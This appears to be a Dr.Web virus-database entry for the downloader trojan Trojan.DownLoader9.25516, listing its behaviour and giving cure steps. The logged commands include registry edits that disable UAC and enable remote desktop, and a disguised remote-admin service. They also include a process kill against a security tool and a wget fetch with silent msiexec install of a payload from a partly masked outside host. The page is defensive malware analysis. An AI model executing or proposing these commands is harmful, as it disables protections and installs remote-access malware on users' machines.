Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader9.25516

Добавлен в вирусную базу Dr.Web: 2013-06-05

Описание добавлено:

Техническая информация

Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
Создает и запускает на исполнение:
  • '%PROGRAM_FILES%\Company\Image JPG\wget.exe' "http://ww#.#yndns.dk/2/WindowsUpdate.msi"
Запускает на исполнение:
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
  • '<SYSTEM32>\sc.exe' config RManService displayname= "Windows Update"
  • '<SYSTEM32>\taskkill.exe' /f /im anvir.exe
  • '<SYSTEM32>\attrib.exe' +s +h +r "<SYSTEM32>\WinUpdate"
  • '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Classes\Installer\Products\BA5437DC26F19344BADA391C3E2EC10B" /f
  • '<SYSTEM32>\sc.exe' description RManService "Windows Media alloy media files downloads"
  • '<SYSTEM32>\sc.exe' config RManService start= "auto"
  • '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %PROGRAM_FILES%\Company\Image JPG\0001.jpg
  • '<SYSTEM32>\msiexec.exe' /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
  • '<SYSTEM32>\cmd.exe' /c ""%PROGRAM_FILES%\Company\Image JPG\update.cmd" "
  • '<SYSTEM32>\chcp.com' 1251
  • '<SYSTEM32>\ping.exe' 127.0.0.1
  • '<SYSTEM32>\msiexec.exe' /I "WindowsUpdate.msi" /qn
  • '<SYSTEM32>\msiexec.exe' /V
  • '<SYSTEM32>\msiexec.exe' /x {CD7345AB-1F62-4439-ABAD-93C1E3E21CB0} /qn REBOOT=ReallySuppress
Изменения в файловой системе:
Создает следующие файлы:
  • %HOMEPATH%\Recent\0001.lnk
  • %PROGRAM_FILES%\Company\Image JPG\wget.exe
  • %HOMEPATH%\Recent\Image JPG.lnk
  • <SYSTEM32>\WinUpdate\ww3
  • %PROGRAM_FILES%\Company\Image JPG\WindowsUpdate.msi
  • %TEMP%\$inst\temp_0.tmp
  • %TEMP%\$inst\2.tmp
  • %PROGRAM_FILES%\Company\Image JPG\ww2
  • %PROGRAM_FILES%\Company\Image JPG\update.cmd
  • %PROGRAM_FILES%\Company\Image JPG\0001.jpg
Удаляет следующие файлы:
  • <SYSTEM32>\WinUpdate\ww3
  • %TEMP%\$inst\2.tmp
  • %TEMP%\$inst\temp_0.tmp
Сетевая активность:
Подключается к:
  • 'ww#.#yndns.dk':80
TCP:
Запросы HTTP GET:
  • ww#.#yndns.dk/2/WindowsUpdate.msi
UDP:
  • DNS ASK ww#.#yndns.dk
Другое:
Ищет следующие окна:
  • ClassName: '(null)' WindowName: '(null)'
  • ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке